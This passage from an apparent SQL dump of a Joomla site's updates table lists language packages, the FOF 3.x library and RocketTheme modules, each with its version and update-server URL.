Cyrillic','','pkg_sr-RS','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(1165,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(1166,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(1167,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(1168,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(1169,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(1170,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(1171,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(1172,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(1173,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(1174,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(1175,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(1176,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.4','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3046',''),(1177,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(1178,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(1179,3,0,'French','','pkg_fr-FR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(1180,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(1181,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(1182,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(1183,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(1184,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(1185,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(1186,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(1187,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(1188,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(1189,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(1190,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(1191,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(1192,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(1193,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(1194,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(1195,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(1196,3,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(1197,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.6.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(1198,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(1199,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(1200,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(1201,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(1202,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(1203,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(1204,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(1205,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(1206,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(1207,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(1208,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(1209,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(1210,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(1211,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(1212,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(1213,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(1214,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(1215,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(1216,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(1217,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(1218,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(1219,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(1220,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(1221,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(1222,57,0,'French','','pkg_fr-FR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(1223,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(1224,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(1225,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(1226,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(1227,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(1228,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(1229,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(1230,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(1231,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(1232,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(1233,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(1234,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(1235,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(1236,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(1237,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(1238,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(1239,57,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(1240,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.6.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(1241,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(1242,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(1243,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(1244,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(1245,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(1246,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(1247,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(1248,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(1249,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(1250,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(1251,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(1252,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(1253,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(1254,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(1255,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(1256,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(1257,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(1258,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(1259,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(1260,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.4','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3046',''),(1261,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(1262,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(1263,3,0,'French','','pkg_fr-FR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(1264,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(1265,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(1266,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(1267,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(1268,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(1269,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(1270,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(1271,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(1272,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(1273,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(1274,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(1275,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(1276,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(1277,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(1278,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(1279,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(1280,3,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(1281,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.6.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(1282,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(1283,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(1284,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(1285,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(1286,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(1287,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(1288,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(1289,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(1290,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(1291,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(1292,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(1293,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(1294,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(1295,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(1296,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(1297,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(1298,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(1299,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(1300,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(1301,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(1302,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(1303,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(1304,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(1305,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(1306,57,0,'French','','pkg_fr-FR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(1307,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(1308,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(1309,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(1310,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(1311,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(1312,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(1313,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(1314,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(1315,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(1316,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(1317,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(1318,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(1319,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(1320,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(1321,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(1322,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(1323,57,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(1324,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.6.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(1325,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(1326,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(1327,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(1328,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(1329,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(1330,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(1331,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(1332,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(1333,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(1334,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(1335,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(1336,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(1337,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(1338,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(1339,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(1340,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(1341,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(1342,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(1343,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(1344,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.4','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3046',''),(1345,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(1346,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(1347,3,0,'French','','pkg_fr-FR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(1348,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(1349,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(1350,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(1351,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(1352,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(1353,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(1354,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(1355,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(1356,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(1357,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(1358,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(1359,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(1360,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(1361,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(1362,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(1363,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(1364,3,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(1365,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.6.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(1366,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(1367,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(1368,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(1369,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(1370,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(1371,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(1372,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(1373,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(1374,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(1375,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(1376,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(1377,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(1378,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(1379,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(1380,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(1381,3,0,'German 